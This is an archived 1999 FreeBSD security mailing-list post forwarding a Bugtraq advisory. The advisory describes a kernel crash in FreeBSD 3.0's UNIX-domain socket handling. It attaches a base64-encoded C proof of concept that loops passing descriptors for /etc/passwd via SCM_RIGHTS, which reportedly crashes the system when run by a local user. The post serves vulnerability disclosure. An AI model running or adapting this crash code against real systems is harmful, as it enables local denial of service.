From owner-freebsd-security Thu May 6 11:38:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 5FC3E14C48 for ; Thu, 6 May 1999 11:38:04 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 13869 invoked by uid 1001); 6 May 1999 18:38:00 +0000 (GMT) To: security@freebsd.org Subject: Forward: KKIS.05051999.003b From: sthaug@nethelp.no X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Multipart/Mixed; boundary="--Next_Part(Thu_May__6_20:37:58_1999)--" Date: Thu, 06 May 1999 20:38:00 +0200 Message-ID: <13867.926015880@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----Next_Part(Thu_May__6_20:37:58_1999)-- Content-Type: Text/Plain; charset=us-ascii Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from 14. april. Steinar Haug, Nethelp consulting, sthaug@nethelp.no ----Next_Part(Thu_May__6_20:37:58_1999)-- Content-Type: Message/rfc822 Return-Path: Delivered-To: sthaug@NETHELP.NO Received: (qmail 13276 invoked from network); 6 May 1999 17:49:49 +0000 (GMT) Received: from segate.sunet.se (192.36.125.6) by verdi.nethelp.no with SMTP; 6 May 1999 17:49:49 +0000 (GMT) Received: from segate.sunet.se (192.36.125.16) by SEGATE.SUNET.SE (LSMTP for OpenVMS v1.1a) with SMTP id <10.F91D42BE@SEGATE.SUNET.SE>; Thu, 6 May 1999 18:51:54 +0100 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with spool id 573208 for BUGTRAQ@NETSPACE.ORG; Thu, 6 May 1999 17:44:01 +0000 Approved-By: aleph1@UNDERGROUND.ORG Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by netspace.org (8.8.7/8.8.7) with ESMTP id FAA21128 for ; Wed, 5 May 1999 05:22:29 -0400 Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by nova.kki.krakow.pl (8.8.7/Ver.2c) with ESMTP id LAA18201 for ; Wed, 5 May 1999 11:26:21 +0200 X-Sender: lluzar@nova.kki.krakow.pl MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="1958937097-2116286281-925896381=:17696" Message-ID: Date: Wed, 5 May 1999 11:26:21 +0200 Reply-To: Lukasz Luzar Sender: Bugtraq List From: Lukasz Luzar Subject: KKIS.05051999.003b To: BUGTRAQ@NETSPACE.ORG This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1958937097-2116286281-925896381=:17696 Content-Type: TEXT/PLAIN; charset=US-ASCII ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Report title : Security problem with sockets in FreeBSD's implementation of UNIX-domain protocol family. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Report created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Raport published : 5th May 1999 Raport code : KKIS.05051999.003.b Systems affected : FreeBSD-3.0 and maybe 3.1, Archive : http://www.security.kki.pl/advisories/ Risk level : high ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As you know, "The UNIX-domain protocol family is a collection of protocols that provides local interprocess communication through the normal socket mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses filesystem pathnames for addressing." The SOCK_STREAM sockets also supports the communication of UNIX file descriptors through the use of functions sendmsg() and recvmsg(). While testing UNIX-domain protocols, we have found probable bug in FreeBSD's implementation of this mechanism. When we had run attached example on FreeBSD-3.0 as local user, system had crashed imediatelly with error "Supervisor read, page not present" in kernel mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Look to attached example. ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --1958937097-2116286281-925896381=:17696 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="example.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="example.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQoj aW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy91bi5oPg0K I2luY2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk ZWZpbmUgUEFUSCAiL3RtcC8xMjMiDQojZGVmaW5lIFBBVEhfVE1QICIvdG1w LzEyMy50bXAiDQojZGVmaW5lIFNPTUVfRklMRSAiL2V0Yy9wYXNzd2QiDQoN CnN0cnVjdCBteWNtc2doZHIgew0KCXN0cnVjdCBjbXNnaGRyIGhkcjsNCglp bnQJZmQ7DQp9Ow0KDQpleHRlcm4gZXJybm87DQoNCnZvaWQgc2VydmVyKCk7 DQp2b2lkIGNsaWVudCgpOw0KDQp2b2lkIG1haW4oKQ0Kew0KCXN3aXRjaCAo IGZvcmsoKSkgew0KCWNhc2UgLTE6DQoJCXByaW50ZiggImZvcmsgZXJyb3Ig JWRcbiIsZXJybm8pOw0KCQlicmVhazsNCgljYXNlIDA6DQoJCWZvciAoOzsp IGNsaWVudCgpOw0KCWRlZmF1bHQ6DQoJCXNlcnZlcigpOw0KCX0NCn0NCg0K dm9pZCBzZXJ2ZXIoKQ0Kew0KCXN0cnVjdCBzb2NrYWRkcl91biBhZGRyOw0K CXN0cnVjdCBtc2doZHIgbXltc2doZHI7DQoJc3RydWN0IG15Y21zZ2hkciBh bmNkYnVmOw0KCWNoYXIgCWRhdGFbIDFdOw0KCWludAlzb2NrZmQsDQoJCWxl biwNCgkJZmQ7DQoNCglpZiAoIHVubGluayggUEFUSCkgPT0gLTEpDQoJCXBy aW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglpZiAoKCBz b2NrZmQgPSBzb2NrZXQoIEFGX1VOSVgsU09DS19ER1JBTSwwKSkgPT0gLTEp DQoJCXByaW50ZiggInNvY2tldCBlcnJvciAlZFxuIixlcnJubyk7DQoNCglz dHJjcHkoIGFkZHIuc3VuX3BhdGgsUEFUSCk7DQoJYWRkci5zdW5fbGVuID0g c2l6ZW9mKCBhZGRyLnN1bl9sZW4pICsgc2l6ZW9mKCBhZGRyLnN1bl9mYW1p bHkpIA0KCQkJKyBzdHJsZW4oIGFkZHIuc3VuX3BhdGgpOyANCglhZGRyLnN1 bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5kKCBzb2NrZmQsKHN0 cnVjdCBzb2NrYWRkciAqKSAmYWRkcixhZGRyLnN1bl9sZW4pID09IC0xKQ0K CQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCWZvciAo OzspIHsNCg0KCQlpZiAoKCBmZCA9IG9wZW4oIFNPTUVfRklMRSxPX1JET05M WSkpID09IC0xKSANCgkJCXByaW50ZiggIm9wZW4gZmlsZSBlcnJvciAlZFxu IixlcnJubyk7DQoNCgkJbGVuID0gc2l6ZW9mKCBhZGRyLnN1bl9wYXRoKTsN Cg0KCQlpZiAoIHJlY3Zmcm9tKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBkYXRh KSwwLA0KCQkJKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkciwmbGVuKSA9PSAt MSkgDQoJCQlwcmludGYoICJyZWN2ZnJvbSBlcnJvciAlZFxuIixlcnJubyk7 DQoNCgkJYW5jZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYp Ow0KCQlhbmNkYnVmLmhkci5jbXNnX2xldmVsID0gU09MX1NPQ0tFVDsNCgkJ YW5jZGJ1Zi5oZHIuY21zZ190eXBlID0gU0NNX1JJR0hUUzsNCgkJYW5jZGJ1 Zi5mZCA9IGZkOw0KDQoJCW15bXNnaGRyLm1zZ19uYW1lID0gKGNhZGRyX3Qp ICZhZGRyOw0KCQlteW1zZ2hkci5tc2dfbmFtZWxlbiA9IGxlbjsNCgkJbXlt c2doZHIubXNnX2lvdiA9IE5VTEw7DQoJCW15bXNnaGRyLm1zZ19pb3ZsZW4g PSAwOw0KCQlteW1zZ2hkci5tc2dfY29udHJvbCA9IChjYWRkcl90KSAmYW5j ZGJ1ZjsNCgkJbXltc2doZHIubXNnX2NvbnRyb2xsZW4gPSBhbmNkYnVmLmhk ci5jbXNnX2xlbjsNCgkJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCgkJDQoJ CWlmICggc2VuZG1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkgDQoJ CQlwcmludGYoICJzZW5kbXNnIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCQlj bG9zZSggZmQpOw0KCX0NCn0NCg0Kdm9pZCBjbGllbnQoKQ0Kew0KCXN0cnVj dCBzb2NrYWRkcl91bglhZGRyX3MsDQoJCQkJYWRkcl9jOw0KCXN0cnVjdCBt eWNtc2doZHIJYW5jZGJ1ZjsNCglzdHJ1Y3QgbXNnaGRyCQlteW1zZ2hkcjsN CgljaGFyIAlkYXRhWyAxXTsNCglpbnQJc29ja2ZkLA0KCQlsZW4sDQoJCWZk Ow0KDQoJaWYgKCggc29ja2ZkID0gc29ja2V0KCBBRl9VTklYLFNPQ0tfREdS QU0sMCkpID09IC0xKSANCgkJcHJpbnRmKCAic29ja2V0IGVycm9yICVkXG4i LGVycm5vKTsNCg0KCWlmICggdW5saW5rKCBQQVRIX1RNUCkgPT0gLTEpDQoJ CXByaW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglzdHJj cHkoIGFkZHJfYy5zdW5fcGF0aCxQQVRIX1RNUCk7DQoJYWRkcl9jLnN1bl9s ZW4gPSBzaXplb2YoIGFkZHJfYy5zdW5fbGVuKSArIHNpemVvZihhZGRyX2Mu c3VuX2ZhbWlseSkgDQoJCQkgICsgc3RybGVuKCBhZGRyX2Muc3VuX3BhdGgp Ow0KCWFkZHJfYy5zdW5fZmFtaWx5ID0gQUZfVU5JWDsNCg0KCXN0cmNweSgg YWRkcl9zLnN1bl9wYXRoLFBBVEgpOw0KCWFkZHJfcy5zdW5fbGVuID0gc2l6 ZW9mKCBhZGRyX3Muc3VuX2xlbikgKyBzaXplb2YoYWRkcl9zLnN1bl9mYW1p bHkpDQoJCSAgICAgICAgICAgKyBzdHJsZW4oIGFkZHJfcy5zdW5fcGF0aCk7 DQoJYWRkcl9zLnN1bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5k KCBzb2NrZmQsKHN0cnVjdCBzb2NrYWRkciopICZhZGRyX2MsYWRkcl9jLnN1 bl9sZW4pID09IC0xKQ0KCQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVy cm5vKTsNCg0KCWlmICggc2VuZHRvKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBk YXRhKSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikgJmFkZHJfcywNCgkJYWRkcl9z LnN1bl9sZW4pID09IC0xKSANCgkJcHJpbnRmKCAic2VuZHRvIGVycm9yICVk XG4iLGVycm5vKTsNCg0KCWxlbiA9IGFkZHJfcy5zdW5fbGVuOw0KDQoJYW5j ZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYpOw0KCWFuY2Ri dWYuaGRyLmNtc2dfbGV2ZWwgPSBTT0xfU09DS0VUOw0KCWFuY2RidWYuaGRy LmNtc2dfdHlwZSA9IFNDTV9SSUdIVFM7DQoNCglteW1zZ2hkci5tc2dfbmFt ZSA9IE5VTEw7DQoJbXltc2doZHIubXNnX25hbWVsZW4gPSAwOw0KCW15bXNn aGRyLm1zZ19pb3YgPSBOVUxMOw0KCW15bXNnaGRyLm1zZ19pb3ZsZW4gPSAw Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sID0gKGNhZGRyX3QpICZhbmNkYnVm Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sbGVuID0gYW5jZGJ1Zi5oZHIuY21z Z19sZW47DQoJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCg0KCWlmICggcmVj dm1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkNCgkJcHJpbnRmKCAi cmVjdm1zZyBlcnJvciAlZFxuIixlcnJubyk7DQoNCglmZCA9IGFuY2RidWYu ZmQ7DQoJDQoJY2xvc2UoZmQpOw0KCWNsb3NlKCBzb2NrZmQpOw0KfQ0K --1958937097-2116286281-925896381=:17696-- ----Next_Part(Thu_May__6_20:37:58_1999)---- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message